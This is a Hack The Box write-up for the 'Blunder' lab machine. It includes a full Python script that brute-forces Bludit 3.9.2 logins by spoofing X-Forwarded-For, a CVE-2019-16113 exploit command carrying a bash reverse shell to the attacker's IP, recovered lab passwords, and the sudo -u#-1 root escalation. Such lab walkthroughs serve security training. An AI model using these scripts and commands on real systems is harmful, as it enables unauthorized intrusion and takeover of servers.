Blunder – Hack The Box

Add a comment

 

Overall Summary

This Hack The Box machine by finding a Bludit login page and its version to take advantage of a vulnerability that bypasses IP blocking when attempting to brute force the login page, a username can be found in a file and the password is within the web site. Once logged in there is another vulnerability go achieve RCE when uploading PHP code as a JPG file. Privilege escalation consisted in becoming another user and then take advantage of a Sudo vulnerability to get root privileges.

Scanning and Enumeration

A full nmap TCP scan only shows one open port as being an HTTP web service.

Browsing to the HTTP web service displays a page that contains some posts with not interesting information to move forward. Soruce code also doesn’t reveal anything important.

The page itself didn’t seem like it had any interesting link to something like a login page but using gobuster reveals a few directories and files which could be of interest. I usually check for PHP and text files when using tools like gobuster.


If we navigate first to the /admin directory we would find a login page for Bludit.


At this stage we don’t have any credentials to log in, but we do have some more results from the directory scan. Opening the todo.txt file displays some information about a list of tasks to be done.

Something that I thought would be useful to take from this file was the name “fergus” since it could be a potential username or password. Going back to the login page I first attempted to log in with a few common usernames and passwords, some google searching also suggested that a username is usually admin, unfortunately nothing that I tried worked and after a few tries It would block my IP for a a couple of minutes making it hard to brute force it.
Since the todo.txt file also suggested that something might be outdated I thought looking for a version would benefit here to move forward. If we go back again to the login page and look at the source code I noticed that there is a version number that keeps repeating at the end of the URLs that are in the first sections.

Exploitation

With the information gathered I looked up Bludit 3.9.2 and quickly came across the following post:  https://medium.com/@musyokaian/bludit-cms-version-3-9-2-brute-force-protection-bypass-283f39a84bbb . The blog post talks about the IP blocking that I came across before while trying to brute force the login process and explains how it that feature can be bypassed by using a different value in the X-Forwarded-For header tag every time a login attempt is made. Without going through a lot of explanation I used the python script that was used in that post and modified it with the information I had. This is the code:

#!/usr/bin/env python3
import re
import requests


host = "http://10.10.10.191" # change to the appropriate URL


login_url = host + '/admin/login'
username = 'fergus' # Change to the appropriate username
fname = "/home/someuser/wordlists/top100-passowrds.txt" #change this to the appropriate file you can specify the full path to the file
with open(fname) as f:
    content = f.readlines()
    word1 = [x.strip() for x in content]
wordlist = word1


for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)


    print('[*] Trying: {p}'.format(p = password))


    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }


    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }


    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)


    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

I used a small dictionary of words to brute force the password and the usernames admin and fergus but had no luck getting valid credentials. From my OSCP studies I had learned about a tool called cewl which would allow me to get words from the web site and save them into a file and then use that file as a wordlist. To get words that are of at least 6 characters in length I used the following command:

cewl 10.10.10.191 -m 6 -w cewl.txt

The words were saved to a file called cewl.txt so I changed the wordlist in the script to my new wordlist. After executing the script again with the username “fergus” and my new wordlist file, valid credentials were finally found.

This is a screenshot of the admin dashboard once logged in with the valid credentials.

To get RCE from here, there was another vulnerability for Bludit 3.9.2 that would allow RCE via bl-kernel/ajax/upload-images.php where PHP code can be entered into a .jpg file name to then wirte code with that same PHP code. To get a low privilege shell I used a python script that was written by cybervaca and it can be found here: https://github.com/cybervaca/CVE-2019-16113 . I set up a netcat listener on port 443 and then executed the script as follows:

python3 CVE-2019-16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "bash -c 'sh -i >& /dev/tcp/10.10.14.12/443 0>&1'"

I was able to successfully get a reverse shell as www-data.

Once inside the machine I first spawn a TTY shell as I usually do it when I get my first shell, I used python to accomplish this.

python -c 'import pty; pty.spawn("bin/bash")'

With the shell I had I was placed under the /var/www/bludit-3.9.2/bl-content/tmp directory and I was looking at the files from there before going to a previous directory. As i went back all the way to the /var/www directory I noticed a newer version of Bludit.

I browsed to this folder and found a hashed password inside the /var/www/bludit-3.10.0a/bl-content/databases folder in the users.php fil.

Viewing the contents of the file reveals some information about a user with a nickname Hugo and a hashed password.

From the contents of the /etc/passwd file I found out that “hugo” was a user in the machine and it could be worth trying to decrypt the hashed password and use it to become hugo. The hash was identified as SHA1 and used this site which successfully found a password match.

I then tried to su into the “hugo” user with the password “Password120” and was able to successfully become hugo.

Post-Exploitation

For privilege escalation, this part was very easy as I simply issued the command “sudo -l” to see if I had a way to sudo to the root account. The output suggested that the user can’t run /bin/bash as root but it can as any other user.

While we are not able to able to run /bin/bash as root but we can as any other user, this part seemed interesting enough to further investigate. After a quick google search I came across this POC 

https://www.exploit-db.com/exploits/47502

which explains how versions of sudo that are 1.8.27 or lower are vulnerable to executing the sudo command as a user with an id of 0. I first checked the sudo version of the machine with the “sudo –version” command and the version was 1.8.25, making it a good candidate to execute this vulnerability.

 To get root access I executed the following command as explained in the POC     URL:
sudo -u#-1 /bin/bash
I was able to successfully gain root privileges.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments